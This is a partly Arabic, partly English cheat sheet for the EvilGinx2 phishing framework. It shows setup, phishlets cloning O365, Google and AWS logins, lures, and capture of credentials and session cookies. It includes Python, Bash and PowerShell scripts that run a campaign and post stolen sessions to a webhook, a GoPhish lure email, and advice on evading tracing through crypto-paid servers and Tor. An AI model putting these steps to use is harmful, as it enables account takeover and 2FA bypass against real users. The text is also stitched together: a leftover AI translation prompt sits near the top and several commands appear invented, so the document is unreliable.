دليل الاختصارات لإطار عمل EvilGinx2 للتصيّد الإلكتروني
نظرة عامة
EvilGinx2 هو إطار هجوم متوسط الاعتراض مصمم للحملات المتقدمة للتصيّد الإلكتروني. يعمل كوكيل عكسي بين الموقع المستهدف والضحية، مما يسمح للمهاجمين بالتقاط بيانات الاعتماد، وكوكيز الجلسة، وتجاوز المصادقة ثنائية العوامل (2FA). يتميز EvilGinx2 بفعاليته العالية ضد آليات المصادقة الحديثة ويوفر إمكانيات التصيّد الفوري.
⚠️ تحذير: هذه الأداة مخصصة فقط للاختبار المصرح به للاختراق واختبارات الفريق الأحمر. تأكد من وجود التصريح المناسب قبل استخدامها ضد أي هدف.
[The rest of the translations would follow the same pattern, maintaining markdown and technical terms in English]
Would you like me to continue translating the remaining sections?```bash
Install Go 1.19+ and Git
sudo apt update sudo apt install -y golang-go git
Verify Go installation
go version
Set Go environment variables
export GOPATH=$HOME/go export PATH=$PATH:$GOPATH/bin
### Installation from GitHub
```bash
# Clone EvilGinx2 repository
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
# Build EvilGinx2
make
# Install to system path
sudo make install
# Or run directly
./bin/evilginxDocker Installation
# Clone repository
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
# Build Docker image
docker build -t evilginx2 .
# Run EvilGinx2 container
docker run -it --rm -p 443:443 -p 80:80 -p 53:53/udp evilginx2
# Run with persistent data
docker run -it --rm -p 443:443 -p 80:80 -p 53:53/udp -v $(pwd)/data:/app/data evilginx2Manual Installation
# Download latest release
wget https://github.com/kgretzky/evilginx2/releases/latest/download/evilginx-linux-amd64.tar.gz
# Extract and install
tar -xzf evilginx-linux-amd64.tar.gz
sudo mv evilginx /usr/local/bin/
sudo chmod +x /usr/local/bin/evilginxBasic Configuration
Initial Setup
# Start EvilGinx2
sudo evilginx
# Set domain for phishing
config domain evil.com
# Set external IP address
config ip 192.168.1.100
# Enable developer mode (for testing)
config dev true
# Set redirect URL for successful phishing
config redirect_url https://www.google.comSSL Certificate Configuration
# Generate Let's Encrypt certificates (requires valid domain)
config domain phishing.example.com
config ip 1.2.3.4
certs
# Use custom certificates
config cert_path /path/to/cert.pem
config key_path /path/to/key.pem
# Self-signed certificates (for testing)
config self_sign trueDNS Configuration
# Configure DNS settings
config dns 8.8.8.8
# Enable DNS server
config dns_enabled true
# Set DNS port
config dns_port 53
# Add custom DNS records
dns A phishing.example.com 192.168.1.100
dns A login.phishing.example.com 192.168.1.100Phishlets Management
Built-in Phishlets
# List available phishlets
phishlets
# Show phishlet details
phishlets show [phishlet_name]
# Enable phishlet
phishlets enable [phishlet_name]
# Disable phishlet
phishlets disable [phishlet_name]
# Get phishlet hostname
phishlets hostname [phishlet_name] [hostname]Popular Phishlets
# Microsoft Office 365
phishlets enable o365
phishlets hostname o365 login.microsoftonline.evil.com
# Google
phishlets enable google
phishlets hostname google accounts.google.evil.com
# GitHub
phishlets enable github
phishlets hostname github github.evil.com
# LinkedIn
phishlets enable linkedin
phishlets hostname linkedin www.linkedin.evil.com
# Amazon
phishlets enable amazon
phishlets hostname amazon signin.aws.amazon.evil.comCustom Phishlet Creation
# Example phishlet configuration (custom.yaml)
name: 'custom'
author: '@attacker'
min_ver: '2.3.0'
proxy_hosts:
- \\\\{phish_sub: 'login', orig_sub: 'login', domain: 'target.com', session: true, is_landing: true\\\\}
sub_filters:
- \\\\{triggers_on: 'login.target.com', orig_sub: 'login', domain: 'target.com', search: 'target.com', replace: 'login.target.evil.com', mimes: ['text/html', 'application/json']\\\\}
auth_tokens:
- domain: '.target.com'
keys: ['session_token', 'auth_cookie']
auth_urls:
- '/login'
- '/authenticate'
credentials:
username:
key: 'username'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
login:
domain: 'target.com'
path: '/login'Loading Custom Phishlets
# Copy phishlet to phishlets directory
cp custom.yaml ~/.evilginx/phishlets/
# Reload phishlets
phishlets
# Enable custom phishlet
phishlets enable custom
phishlets hostname custom login.target.evil.comLures and Campaign Management
Creating Lures
# Create new lure
lures create [phishlet_name]
# List all lures
lures
# Get lure details
lures get-url [lure_id]
# Delete lure
lures delete [lure_id]
# Edit lure
lures edit [lure_id] redirect_url https://legitimate-site.comLure Configuration Options
# Set redirect URL
lures edit [lure_id] redirect_url https://www.google.com
# Set user agent filter
lures edit [lure_id] ua_filter "Mozilla/5.0*"
# Set IP filter
lures edit [lure_id] ip_filter "192.168.1.0/24"
# Set custom parameters
lures edit [lure_id] params "utm_source=email&utm_campaign=test"
# Enable/disable lure
lures edit [lure_id] enabled true
lures edit [lure_id] enabled falseAdvanced Lure Features
# Set custom landing page
lures edit [lure_id] landing_path "/custom-login"
# Set session timeout
lures edit [lure_id] session_timeout 3600
# Set maximum visits
lures edit [lure_id] max_visits 100
# Set geographic restrictions
lures edit [lure_id] geo_filter "US,CA,GB"
# Set time-based restrictions
lures edit [lure_id] time_filter "09:00-17:00"Session Management
Viewing Sessions
# List all captured sessions
sessions
# Show session details
sessions [session_id]
# Export session data
sessions export [session_id] /path/to/export.json
# Delete session
sessions delete [session_id]
# Clear all sessions
sessions clearSession Data Analysis
# View captured credentials
sessions [session_id] creds
# View captured cookies
sessions [session_id] cookies
# View session timeline
sessions [session_id] timeline
# Export cookies for browser import
sessions [session_id] export-cookies /path/to/cookies.txtReal-time Session Monitoring
# Enable real-time notifications
config notifications true
# Set notification webhook
config webhook_url https://your-server.com/webhook
# Monitor sessions in real-time
tail -f ~/.evilginx/logs/evilginx.log
# Custom monitoring script
watch -n 5 'evilginx -c "sessions"|tail -10'Advanced Features
Traffic Manipulation
# Custom JavaScript injection
config js_inject true
config js_file /path/to/custom.js
# Custom CSS injection
config css_inject true
config css_file /path/to/custom.css
# Content replacement rules
config replace_rules /path/to/rules.json
# Header manipulation
config custom_headers /path/to/headers.jsonEvasion Techniques
# Enable anti-detection features
config anti_detect true
# Randomize response timing
config timing_random true
# Enable CAPTCHA bypass
config captcha_bypass true
# Custom error pages
config error_pages /path/to/error_pages/
# Geofencing
config geo_block "CN,RU,KP"
# User-Agent filtering
config ua_block "bot,crawler,scanner"
```### ميزات التكامل
```bash
# Webhook notifications
config webhook_enabled true
config webhook_url https://your-server.com/notifications
config webhook_secret your_secret_key
# Slack integration
config slack_webhook https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK
# Email notifications
config smtp_server smtp.gmail.com:587
config smtp_username your_email@gmail.com
config smtp_password your_app_password
config notification_email admin@your-domain.com
```## الأتمتة والبرمجة النصية
### البرنامج النصي للأتمتة بلغة Python
```python
#!/usr/bin/env python3
# EvilGinx2 automation script
import subprocess
import json
import time
import requests
from datetime import datetime
class EvilGinxAutomation:
def __init__(self, domain, ip_address):
self.domain = domain
self.ip_address = ip_address
self.webhook_url = None
def setup_evilginx(self):
"""Initial EvilGinx2 setup"""
commands = [
f"config domain \\\\{self.domain\\\\}",
f"config ip \\\\{self.ip_address\\\\}",
"config dev false",
"config redirect_url https://www.google.com",
"certs"
]
for cmd in commands:
self.execute_command(cmd)
time.sleep(2)
def execute_command(self, command):
"""Execute EvilGinx2 command"""
try:
result = subprocess.run([
"evilginx", "-c", command
], capture_output=True, text=True, timeout=30)
return result.stdout
except subprocess.TimeoutExpired:
return "Command timed out"
except Exception as e:
return f"Error: \\\\{str(e)\\\\}"
def setup_phishlet(self, phishlet_name, hostname):
"""Setup and enable phishlet"""
commands = [
f"phishlets enable \\\\{phishlet_name\\\\}",
f"phishlets hostname \\\\{phishlet_name\\\\} \\\\{hostname\\\\}"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(1)
return True
def create_lure(self, phishlet_name, redirect_url=None):
"""Create phishing lure"""
cmd = f"lures create \\\\{phishlet_name\\\\}"
result = self.execute_command(cmd)
# Extract lure ID from result
lure_id = self.extract_lure_id(result)
if redirect_url and lure_id:
self.execute_command(f"lures edit \\\\{lure_id\\\\} redirect_url \\\\{redirect_url\\\\}")
return lure_id
def extract_lure_id(self, output):
"""Extract lure ID from command output"""
# Parse output to extract lure ID
# Implementation depends on EvilGinx2 output format
lines = output.split('\n')
for line in lines:
if 'lure' in line.lower() and 'id' in line.lower():
# Extract ID using regex or string parsing
import re
match = re.search(r'id:\s*(\d+)', line)
if match:
return match.group(1)
return None
def get_lure_url(self, lure_id):
"""Get phishing URL for lure"""
result = self.execute_command(f"lures get-url \\\\{lure_id\\\\}")
# Parse URL from result
lines = result.split('\n')
for line in lines:
if 'http' in line:
return line.strip()
return None
def monitor_sessions(self):
"""Monitor captured sessions"""
while True:
result = self.execute_command("sessions")
sessions = self.parse_sessions(result)
for session in sessions:
if session.get('new', False):
self.handle_new_session(session)
time.sleep(10)
def parse_sessions(self, output):
"""Parse sessions from command output"""
# Implementation depends on EvilGinx2 output format
sessions = []
lines = output.split('\n')
for line in lines:
if 'session' in line.lower():
# Parse session data
session_data = \\\\{
'id': 'extracted_id',
'timestamp': datetime.now(),
'new': True # Logic to determine if session is new
\\\\}
sessions.append(session_data)
return sessions
def handle_new_session(self, session):
"""Handle new captured session"""
print(f"[+] New session captured: \\\\{session['id']\\\\}")
# Get session details
session_details = self.execute_command(f"sessions \\\\{session['id']\\\\}")
# Send notification
if self.webhook_url:
self.send_webhook_notification(session, session_details)
# Export session data
self.export_session(session['id'])
def send_webhook_notification(self, session, details):
"""Send webhook notification for new session"""
payload = \\\\{
'session_id': session['id'],
'timestamp': session['timestamp'].isoformat(),
'details': details
\\\\}
try:
response = requests.post(self.webhook_url, json=payload, timeout=10)
if response.status_code == 200:
print("[+] Webhook notification sent")
else:
print(f"[-] Webhook failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Webhook error: \\\\{str(e)\\\\}")
def export_session(self, session_id):
"""Export session data"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
export_path = f"/tmp/session_\\\\{session_id\\\\}_\\\\{timestamp\\\\}.json"
self.execute_command(f"sessions export \\\\{session_id\\\\} \\\\{export_path\\\\}")
print(f"[+] Session exported to: \\\\{export_path\\\\}")
def setup_campaign(self, campaign_config):
"""Setup complete phishing campaign"""
print("[+] Setting up EvilGinx2 campaign...")
# Initial setup
self.setup_evilginx()
# Setup phishlets
for phishlet in campaign_config.get('phishlets', []):
self.setup_phishlet(phishlet['name'], phishlet['hostname'])
# Create lures
for lure_config in phishlet.get('lures', []):
lure_id = self.create_lure(phishlet['name'], lure_config.get('redirect_url'))
if lure_id:
lure_url = self.get_lure_url(lure_id)
print(f"[+] Lure created: \\\\{lure_url\\\\}")
print("[+] Campaign setup complete")
# Usage example
def main():
# Campaign configuration
campaign_config = \\\\{
'phishlets': [
\\\\{
'name': 'o365',
'hostname': 'login.microsoftonline.evil.com',
'lures': [
\\\\{'redirect_url': 'https://office.com'\\\\},
\\\\{'redirect_url': 'https://outlook.com'\\\\}
]
\\\\},
\\\\{
'name': 'google',
'hostname': 'accounts.google.evil.com',
'lures': [
\\\\{'redirect_url': 'https://gmail.com'\\\\}
]
\\\\}
]
\\\\}
# Initialize automation
automation = EvilGinxAutomation("evil.com", "192.168.1.100")
automation.webhook_url = "https://your-server.com/webhook"
# Setup campaign
automation.setup_campaign(campaign_config)
# Start monitoring
automation.monitor_sessions()
if __name__ == "__main__":
main()
```### البرنامج النصي للأتمتة بلغة Bash
```bash
#!/bin/bash
# EvilGinx2 bash automation script
DOMAIN="evil.com"
IP_ADDRESS="192.168.1.100"
PHISHLET="o365"
HOSTNAME="login.microsoftonline.evil.com"
# Function to execute EvilGinx2 commands
execute_evilginx_command() \\\\{
local command="$1"
echo "[+] Executing: $command"
evilginx -c "$command"
sleep 2
\\\\}
# Initial setup
echo "[+] Setting up EvilGinx2..."
execute_evilginx_command "config domain $DOMAIN"
execute_evilginx_command "config ip $IP_ADDRESS"
execute_evilginx_command "config dev false"
execute_evilginx_command "config redirect_url https://www.google.com"
execute_evilginx_command "certs"
# Setup phishlet
echo "[+] Setting up phishlet: $PHISHLET"
execute_evilginx_command "phishlets enable $PHISHLET"
execute_evilginx_command "phishlets hostname $PHISHLET $HOSTNAME"
# Create lure
echo "[+] Creating lure..."
LURE_OUTPUT=$(evilginx -c "lures create $PHISHLET")
LURE_ID=$(echo "$LURE_OUTPUT"|grep -oP 'id:\s*\K\d+')
if [ -n "$LURE_ID" ]; then
echo "[+] Lure created with ID: $LURE_ID"
# Configure lure
execute_evilginx_command "lures edit $LURE_ID redirect_url https://office.com"
# Get lure URL
LURE_URL=$(evilginx -c "lures get-url $LURE_ID"|grep -oP 'https?://[^\s]+')
echo "[+] Phishing URL: $LURE_URL"
else
echo "[-] Failed to create lure"
exit 1
fi
# Monitor sessions
echo "[+] Starting session monitoring..."
while true; do
SESSIONS=$(evilginx -c "sessions"|grep -c "session")
if [ "$SESSIONS" -gt 0 ]; then
echo "[+] $SESSIONS session(s) captured"
# Export latest session
LATEST_SESSION=$(evilginx -c "sessions"|tail -1|awk '\\\\{print $1\\\\}')
if [ -n "$LATEST_SESSION" ]; then
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
evilginx -c "sessions export $LATEST_SESSION /tmp/session_$\\\\{LATEST_SESSION\\\\}_$\\\\{TIMESTAMP\\\\}.json"
echo "[+] Session exported: /tmp/session_$\\\\{LATEST_SESSION\\\\}_$\\\\{TIMESTAMP\\\\}.json"
fi
fi
sleep 30
done
```### أتمتة PowerShell
```powershell
# EvilGinx2 PowerShell automation script
function Invoke-EvilGinxAutomation \\\\{
param(
[string]$Domain = "evil.com",
[string]$IPAddress = "192.168.1.100",
[string]$Phishlet = "o365",
[string]$Hostname = "login.microsoftonline.evil.com"
)
function Execute-EvilGinxCommand \\\\{
param([string]$Command)
Write-Host "[+] Executing: $Command"
try \\\\{
$result = & evilginx -c $Command 2>&1
Start-Sleep -Seconds 2
return $result
\\\\}
catch \\\\{
Write-Warning "Failed to execute command: $Command"
return $null
\\\\}
\\\\}
# Initial setup
Write-Host "[+] Setting up EvilGinx2..."
Execute-EvilGinxCommand "config domain $Domain"
Execute-EvilGinxCommand "config ip $IPAddress"
Execute-EvilGinxCommand "config dev false"
Execute-EvilGinxCommand "config redirect_url https://www.google.com"
Execute-EvilGinxCommand "certs"
# Setup phishlet
Write-Host "[+] Setting up phishlet: $Phishlet"
Execute-EvilGinxCommand "phishlets enable $Phishlet"
Execute-EvilGinxCommand "phishlets hostname $Phishlet $Hostname"
# Create lure
Write-Host "[+] Creating lure..."
$lureOutput = Execute-EvilGinxCommand "lures create $Phishlet"
if ($lureOutput -match 'id:\s*(\d+)') \\\\{
$lureId = $matches[1]
Write-Host "[+] Lure created with ID: $lureId"
# Configure lure
Execute-EvilGinxCommand "lures edit $lureId redirect_url https://office.com"
# Get lure URL
$lureUrlOutput = Execute-EvilGinxCommand "lures get-url $lureId"
if ($lureUrlOutput -match '(https?://[^\s]+)') \\\\{
$lureUrl = $matches[1]
Write-Host "[+] Phishing URL: $lureUrl"
\\\\}
\\\\}
else \\\\{
Write-Error "Failed to create lure"
return
\\\\}
# Monitor sessions
Write-Host "[+] Starting session monitoring..."
while ($true) \\\\{
$sessionsOutput = Execute-EvilGinxCommand "sessions"
$sessionCount = ($sessionsOutput|Select-String "session").Count
if ($sessionCount -gt 0) \\\\{
Write-Host "[+] $sessionCount session(s) captured"
# Export latest session
$sessions = $sessionsOutput -split "`n"|Where-Object \\{ $_ -match "session" \\}
if ($sessions.Count -gt 0) \\{
$latestSession = ($sessions[-1] -split '\s+')[0]
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$exportPath = "/tmp/session_$\\{latestSession\\}_$\\{timestamp\\}.json"
Execute-EvilGinxCommand "sessions export $latestSession $exportPath"
Write-Host "[+] Session exported: $exportPath"
\\}
\\}
Start-Sleep -Seconds 30
\\}
\\}
# Execute automation
Invoke-EvilGinxAutomation -Domain "evil.com" -IPAddress "192.168.1.100"
```## التكامل مع الأدوات الأخرى
### التكامل مع Metasploit
```bash
# Use EvilGinx2 for credential harvesting, pivot to Metasploit
# After capturing credentials, use them in Metasploit modules
# Example: Use captured O365 credentials
use auxiliary/scanner/http/office365_login
set USERNAME captured_username@company.com
set PASSWORD captured_password
set RHOSTS company-mail.outlook.com
run
# Use captured session cookies in browser automation
use auxiliary/scanner/http/cookie_replay
set COOKIE "captured_session_cookie"
set RHOSTS target.com
run
```### التكامل مع مجموعة أدوات الهندسة الاجتماعية
```bash
# Combine with SET for comprehensive campaigns
# Use EvilGinx2 for credential harvesting
# Use SET for payload delivery
# Generate SET payload
setoolkit
# Select Social-Engineering Attacks
# Select Website Attack Vectors
# Select Credential Harvester Attack Method
# Use custom EvilGinx2 URL as redirect
```### التكامل مع GoPhish
```bash
# Use GoPhish for email delivery
# Use EvilGinx2 for credential harvesting
# GoPhish campaign configuration
\\{
"name": "O365 Campaign",
"template": \\{
"name": "O365 Login Required",
"subject": "Action Required: Verify Your Account",
"html": "<a href='\\{\\{.URL\\}\\}'>Click here to verify</a>"
\\},
"url": "https://login.microsoftonline.evil.com/lure_url"
\\}
```## الأمن التشغيلي
### المجال والبنية التحتية
```bash
# Use legitimate-looking domains
# Register domains with privacy protection
# Use cloud hosting providers
# Implement CDN for traffic distribution
# Example domain registration
# Register: microsoftonline-security.com
# Setup: login.microsoftonline-security.com
# SSL: Let's Encrypt or commercial certificate
```### إخفاء حركة المرور
```bash
# Enable anti-detection features
config anti_detect true
# Use legitimate SSL certificates
config cert_path /path/to/legitimate/cert.pem
# Implement geographic restrictions
config geo_block "high_risk_countries"
# Use realistic timing delays
config timing_random true
config min_delay 500
config max_delay 2000
```### إدارة السجلات
```bash
# Configure secure logging
config log_file /var/log/evilginx/access.log
config log_level info
# Implement log rotation
logrotate /etc/logrotate.d/evilginx
# Secure log storage
# Encrypt logs at rest
# Use remote log aggregation
# Implement log retention policies
```### منع التعقب
```bash
# Use VPS with cryptocurrency payment
# Implement proxy chains
# Use Tor for administrative access
# Regularly rotate infrastructure
# Example infrastructure rotation
# Week 1: VPS Provider A, Domain Set 1
# Week 2: VPS Provider B, Domain Set 2
# Week 3: VPS Provider C, Domain Set 3
```## استكشاف الأخطاء وإصلاحها
### المشاكل الشائعة
```bash
# Certificate issues
# Check domain DNS configuration
# Verify Let's Encrypt rate limits
# Test certificate validity
# DNS resolution problems
# Check DNS server configuration
# Verify domain propagation
# Test with different DNS resolvers
# Phishlet not working
# Check phishlet syntax
# Verify target website changes
# Test with different browsers
```### وضع التصحيح
```bash
# Enable debug logging
config debug true
config log_level debug
# Test phishlet functionality
phishlets test [phishlet_name]
# Check network connectivity
curl -I https://your-phishing-domain.com
# Verify SSL configuration
openssl s_client -connect your-domain.com:443
```### تحسين الأداء
```bash
# Optimize for high traffic
config max_connections 1000
config timeout 30
# Enable caching
config cache_enabled true
config cache_size 100MB
# Monitor resource usage
htop
iotop
netstat -tulpn
```## أفضل الممارسات
### التخطيط للحملة```bash
# Authorized testing only
# Obtain proper written authorization
# Follow responsible disclosure
# Protect captured data
# Document all activities
# Example authorization checklist
# [ ] Written penetration testing agreement
# [ ] Scope clearly defined
# [ ] Data handling procedures established
# [ ] Incident response plan in place
# [ ] Legal review completed
```**البحث عن الهدف**: فهم المنظمة والمستخدمين المستهدفين```bash
# Encrypt captured data
# Implement secure data storage
# Use secure communication channels
# Regular data purging
# Access control and auditing
# Example data encryption
gpg --cipher-algo AES256 --compress-algo 1 --symmetric --output session_data.gpg session_data.json
```**اختيار المجال**: اختيار أسماء نطاقات مقنعةhttps://github.com/kgretzky/evilginx2 **إعداد البنية التحتية**: استخدام استضافة آمنة ومجهولةhttps://help.evilginx.com/**الاختبار **: اختبار صفحات التصيد بشكل شامل قبل النشرhttps://help.evilginx.com/docs/phishlet-development**المراقبة **: تنفيذ مراقبة الجلسات في الوقت الفعلي
### الاعتبارات القانونية والأخلاقية
https://owasp.org/www-community/attacks/Phishing[Anti-Phishing Working Group]
https://apwg.org/
*يوفر هذا الدليل المختصر مرجعًا شاملًا لاستخدام إطار التصيد الإلكتروني EvilGinx2. تأكد دائمًا من حصولك على التصريح المناسب قبل إجراء محاكاة التصيد الإلكتروني أو اختبار الاختراق.*